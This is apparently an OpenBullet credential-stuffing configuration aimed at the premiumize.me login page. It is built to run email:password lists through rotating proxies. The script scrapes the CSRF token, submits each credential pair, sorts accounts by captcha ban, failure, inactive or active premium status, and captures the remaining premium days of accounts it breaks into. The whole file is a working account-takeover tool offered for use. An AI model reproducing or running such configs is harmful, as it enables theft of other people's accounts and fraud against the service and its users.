[SETTINGS]
{
  "Name": "premiumize.me",
  "SuggestedBots": 90,
  "LastModified": "2019-08-11T17:02:15.0565963+02:00",
  "AdditionalInfo": "",
  "Author": "mohamedabb4930",
  "Version": "1.1.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.premiumize.me/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" CSS "[name=\"_token\"]" "value" -> VAR "token" 

REQUEST POST "https://www.premiumize.me/login" 
  CONTENT "_token=<token>&email=<USER>&password=<PASS>&action=login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Origin: https://www.premiumize.me" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://www.premiumize.me/login" 

KEYCHECK 
  KEYCHAIN Ban OR 
    KEY "The captcha was not entered correctly!" 
  KEYCHAIN Success AND 
    KEY "Premium Status" 
    KEY "days remaining" 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "Premium Status" 
    KEY "inactive" 
  KEYCHAIN Failure OR 
    KEY "Login failed! Did you forget your password" 

PARSE "<SOURCE>" REGEX "Premium Status<\\/h3>[\\s]+<p>([^<]*)<" "[1]" -> CAP "Premuim Days " 

SET CAP "CI" "mohamedabb4930"

